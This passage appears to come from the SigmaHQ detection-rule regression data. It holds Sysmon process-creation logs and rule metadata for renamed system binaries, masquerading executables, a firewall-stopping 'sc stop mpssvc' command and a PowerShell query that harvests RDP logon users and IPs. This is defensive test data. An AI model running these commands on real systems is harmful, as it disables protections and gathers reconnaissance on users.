"Hashes": "MD5=12011C44955FD6631113F68A99447515,SHA256=C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3,IMPHASH=12CE1C0F3F5837ECC18A3782408FA975",
"ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02",
"ParentProcessId": 8252,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "AR-WIN-1\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_adfind/info.yml
================================================
id: 09eb713e-f4b1-42ce-9c8e-d446ba0d548a
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: df55196f-f105-44d3-a675-e9dfb6cc2f2b
title: Renamed AdFind Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-22T20:29:25.275782Z"
}
},
"EventRecordID": 256823,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3168,
"ThreadID": 4580
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-1",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-22 20:29:25.272",
"ProcessGuid": "5AB40FD1-3EA5-68F9-2F31-000000003B02",
"ProcessId": 4564,
"Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-netsh.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Network Command Shell",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "netsh.exe",
"CommandLine": "renamed-netsh.exe",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\",
"User": "AR-WIN-1\\Administrator",
"LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000",
"LogonId": "0x104be4",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "MD5=28B5A3688253FD5822EE90BCAE2633F7,SHA256=7482890B1875BDCEC826F3385EAC7DCDC38F17358A13B1B8C790BDB895FF5054,IMPHASH=06F091DBEC9C3F0DD14808FFE59B95DE",
"ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02",
"ParentProcessId": 8252,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "AR-WIN-1\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary/info.yml
================================================
id: e9861f82-77a9-4f8b-a418-0fbb6019588b
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142
title: Potential Defense Evasion Via Binary Rename
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-22T20:28:22.116872Z"
}
},
"EventRecordID": 256810,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3168,
"ThreadID": 4580
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-1",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-22 20:28:22.113",
"ProcessGuid": "5AB40FD1-3E66-68F9-2831-000000003B02",
"ProcessId": 4832,
"Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-wscript.exe",
"FileVersion": "5.812.10240.16384",
"Description": "Microsoft ® Windows Based Script Host",
"Product": "Microsoft ® Windows Script Host",
"Company": "Microsoft Corporation",
"OriginalFileName": "wscript.exe",
"CommandLine": "renamed-wscript.exe",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\",
"User": "AR-WIN-1\\Administrator",
"LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000",
"LogonId": "0x104be4",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "MD5=BA3DDE938146C1C1A19D6762E0BF5311,SHA256=61891E70C5629397DD107066F520D1663C5136AB4366E0CB015EC1D047DFFC61,IMPHASH=EB3973026D64331DD575543A07621F9D",
"ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02",
"ParentProcessId": 8252,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "AR-WIN-1\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml
================================================
id: 8fc87eda-5a7b-4080-93c6-5bf6145330c8
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 0ba1da6d-b6ce-4366-828c-18826c9de23e
title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-22T20:30:29.328671Z"
}
},
"EventRecordID": 256840,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3168,
"ThreadID": 4580
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-1",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-22 20:30:29.319",
"ProcessGuid": "5AB40FD1-3EE5-68F9-3A31-000000003B02",
"ProcessId": 480,
"Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-curl.exe",
"FileVersion": "8.13.0",
"Description": "The curl executable",
"Product": "The curl executable",
"Company": "curl, https://curl.se/",
"OriginalFileName": "curl.exe",
"CommandLine": "renamed-curl.exe",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\",
"User": "AR-WIN-1\\Administrator",
"LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000",
"LogonId": "0x104be4",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F",
"ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02",
"ParentProcessId": 8252,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "AR-WIN-1\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_curl/info.yml
================================================
id: a8016fa4-d7e0-40de-85b0-ae04f270eec5
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 7530cd3d-7671-43e3-b209-976966f6ea48
title: Renamed CURL.EXE Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-22T20:25:23.218638Z"
}
},
"EventRecordID": 256757,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3168,
"ThreadID": 4580
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-1",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-22 20:25:23.215",
"ProcessGuid": "5AB40FD1-3DB3-68F9-0A31-000000003B02",
"ProcessId": 5312,
"Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-ftp.exe",
"FileVersion": "10.0.20348.3451 (WinBuild.160101.0800)",
"Description": "File Transfer Program",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "ftp.exe",
"CommandLine": "renamed-ftp.exe",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\",
"User": "AR-WIN-1\\Administrator",
"LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000",
"LogonId": "0x104be4",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "MD5=02EF5C4F3C041DE47811498C331B6F46,SHA256=B551CF05B43639364EFC71995E19DB620F5EFCE311110D0CF932354C3FE6ED7A,IMPHASH=7B22256667E90FDEA4DBB956FD02584C",
"ParentProcessGuid": "5AB40FD1-8DEB-68F7-7E01-000000003B02",
"ParentProcessId": 476,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "AR-WIN-1\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/info.yml
================================================
id: 280664b2-b588-40f6-8b65-280523049740
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 277a4393-446c-449a-b0ed-7fdc7795244c
title: Renamed FTP.EXE Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-22T20:32:00.478719Z"
}
},
"EventRecordID": 256855,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3168,
"ThreadID": 4580
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-1",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-22 20:32:00.468",
"ProcessGuid": "5AB40FD1-3F40-68F9-4431-000000003B02",
"ProcessId": 2808,
"Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-msdt.exe",
"FileVersion": "10.0.20348.2849 (WinBuild.160101.0800)",
"Description": "Diagnostics Troubleshooting Wizard",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "msdt.exe",
"CommandLine": "renamed-msdt.exe",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\",
"User": "AR-WIN-1\\Administrator",
"LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000",
"LogonId": "0x104be4",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "MD5=7C70F1DDC865BCFF963AD1CCFAA5E145,SHA256=377DD147174704790E2E981893E49FB72CE18133CF7E9E2EAA794ADF2F80D2DA,IMPHASH=9F0D1C67FCB6D4D5059556FF5E9A642B",
"ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02",
"ParentProcessId": 8252,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "AR-WIN-1\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_msdt/info.yml
================================================
id: 0e26deb8-bbad-45fb-bb52-b5a2204ba626
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: bd1c6866-65fc-44b2-be51-5588fcff82b9
title: Renamed Msdt.EXE Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-22T20:33:27.276702Z"
}
},
"EventRecordID": 256875,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3168,
"ThreadID": 4580
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-1",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-22 20:33:27.274",
"ProcessGuid": "5AB40FD1-3F97-68F9-5631-000000003B02",
"ProcessId": 3424,
"Image": "C:\\Windows\\System32\\sc.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Service Control Manager Configuration Tool",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "sc.exe",
"CommandLine": "sc stop mpssvc",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\",
"User": "AR-WIN-1\\Administrator",
"LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000",
"LogonId": "0x104be4",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "MD5=6FB10CD439B40D92935F8F6A0C99670A,SHA256=2BF663EA493CDC21AD33AEBD8DA40CC5D2AFA55E24F9E1BBF3D73E99DCADF693,IMPHASH=803254E010814E69947095A2725B2AFD",
"ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02",
"ParentProcessId": 8252,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "AR-WIN-1\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-22T20:33:27.276702Z"
}
},
"EventRecordID": 256875,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3168,
"ThreadID": 4580
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-1",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-22 20:33:27.274",
"ProcessGuid": "5AB40FD1-3F97-68F9-5631-000000003B02",
"ProcessId": 3424,
"Image": "C:\\Windows\\System32\\sc.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Service Control Manager Configuration Tool",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "sc.exe",
"CommandLine": "sc stop mpssvc",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\",
"User": "AR-WIN-1\\Administrator",
"LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000",
"LogonId": "0x104be4",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "MD5=6FB10CD439B40D92935F8F6A0C99670A,SHA256=2BF663EA493CDC21AD33AEBD8DA40CC5D2AFA55E24F9E1BBF3D73E99DCADF693,IMPHASH=803254E010814E69947095A2725B2AFD",
"ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02",
"ParentProcessId": 8252,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "AR-WIN-1\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/info.yml
================================================
id: 81ea361b-6e7b-417c-8f70-abd288b10c35
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 81bcb81b-5b1f-474b-b373-52c871aaa7b1
title: Stop Windows Service Via Sc.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon/beaa66d6-aa1b-4e3c-80f5-e0145369bfaf.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-03T07:42:38.210937Z"
}
},
"EventRecordID": 26765,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3116,
"ThreadID": 1656
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-03 07:42:38.149",
"ProcessGuid": "0197231E-E9EE-692F-B004-000000000900",
"ProcessId": 9720,
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"FileVersion": "10.0.26100.1 (WinBuild.160101.0800)",
"Description": "Windows PowerShell",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "PowerShell.EXE",
"CommandLine": "powershell -Command \"Get-WinEvent -LogName 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' | Where-Object {$_.Id -eq 21} | ForEach-Object { $eventXml = [xml]$_.ToXml(); $username = $eventXml.Event.UserData.EventXML.User; $ipAddress = $eventXml.Event.UserData.EventXML.Address; $loginTime = $_.TimeCreated; if ($username -and $ipAddress -and $loginTime) { Write-Output ('User: ' + $username + ' IP: ' + $ipAddress + ' Login Time: ' + $loginTime) }}\"",
"CurrentDirectory": "C:\\Users\\xodih\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-BBFB-692F-3C8C-050000000000",
"LogonId": "0x58c3c",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=1736263E02468939F808C0528E8DBB7E,SHA256=1F9FFC2227F8DEA8B771D543C464CF8166C22A39420A5322B5892A640C4B34B6,IMPHASH=68A9FF9C8D0D4655E46E1A7A190A41D2",
"ParentProcessGuid": "0197231E-E967-692F-A904-000000000900",
"ParentProcessId": 9076,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon/info.yml
================================================
id: a31979d4-d358-47c1-b698-875ec379a3c1
description: N/A
date: 2025-12-03
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf
title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon/beaa66d6-aa1b-4e3c-80f5-e0145369bfaf.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly/e4a6b256-3e47-40fc-89d2-7a477edd6915.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2026-02-04T08:52:58.205267Z"
}
},
"EventRecordID": 715573,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 776,
"ThreadID": 4344
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "srv-01.midgardnet.tech",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2026-02-04 08:52:58.203",
"ProcessGuid": "14207D89-08EA-6983-2A02-000000004402",
"ProcessId": 5696,
"Image": "C:\\Users\\SwachchhandaP\\Downloads\\taskhost.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Windows Calculator",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CALC.EXE",
"CommandLine": "taskhost.exe",
"CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\",
"User": "MIDGARDNET\\SwachchhandaP",
"LogonGuid": "14207D89-057C-6983-A047-0C0000000000",
"LogonId": "0xc47a0",
"TerminalSessionId": 2,
"IntegrityLevel": "Medium",
"Hashes": "MD5=1FD4DD58C75D6F2EDCDB337EE686231E,SHA256=4208893C871D2499F184E3F0F2554DA89F451FA9E98D95FC9516C5AE8F2B3BBD,IMPHASH=8EEAA9499666119D13B3F44ECD77A729",
"ParentProcessGuid": "14207D89-08EA-6983-2902-000000004402",
"ParentProcessId": 1816,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "cmd /c taskhost.exe",
"ParentUser": "MIDGARDNET\\SwachchhandaP"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly/info.yml
================================================
id: 0efa6f32-c1df-4053-91ca-cafc05416e79
description: N/A
date: 2026-02-04
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: e4a6b256-3e47-40fc-89d2-7a477edd6915
title: System File Execution Location Anomaly
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly/e4a6b256-3e47-40fc-89d2-7a477edd6915.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution/be58d2e2-06c8-4f58-b666-b99f6dc3b6cd.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2026-02-04T08:47:45.988926Z"
}
},
"EventRecordID": 715337,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 776,
"ThreadID": 4344
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "srv-01.midgardnet.tech",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2026-02-04 08:47:45.987",
"ProcessGuid": "14207D89-07B1-6983-EA01-000000004402",
"ProcessId": 5592,
"Image": "C:\\Users\\SwachchhandaP\\Downloads\\svchost.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Windows Calculator",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CALC.EXE",
"CommandLine": ".\\svchost.exe",
"CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\",
"User": "MIDGARDNET\\SwachchhandaP",
"LogonGuid": "14207D89-057C-6983-A047-0C0000000000",
"LogonId": "0xc47a0",
"TerminalSessionId": 2,
"IntegrityLevel": "Medium",
"Hashes": "MD5=1FD4DD58C75D6F2EDCDB337EE686231E,SHA256=4208893C871D2499F184E3F0F2554DA89F451FA9E98D95FC9516C5AE8F2B3BBD,IMPHASH=8EEAA9499666119D13B3F44ECD77A729",
"ParentProcessGuid": "14207D89-0781-6983-E201-000000004402",
"ParentProcessId": 984,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "MIDGARDNET\\SwachchhandaP"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution/info.yml
================================================
id: 9cee7767-9219-40b3-b77e-dedf82957c94
description: N/A
date: 2026-02-04
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: be58d2e2-06c8-4f58-b666-b99f6dc3b6cd
title: Suspicious Process Masquerading As SvcHost.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution/be58d2e2-06c8-4f58-b666-b99f6dc3b6cd.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification/8f3ab69a-aa22-4943-aa58-e0a52fdf6818.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2026-01-05T06:59:26.079827Z"
}
},
"EventRecordID": 75087,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3636,
"ThreadID": 4340
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2026-01-05 06:59:26.059",
"ProcessGuid": "0197231E-614E-695B-DC0C-000000000C00",
"ProcessId": 11680,
"Image": "C:\\Windows\\System32\\reg.exe",
"FileVersion": "10.0.26100.5074 (WinBuild.160101.0800)",
"Description": "Registry Console Tool",
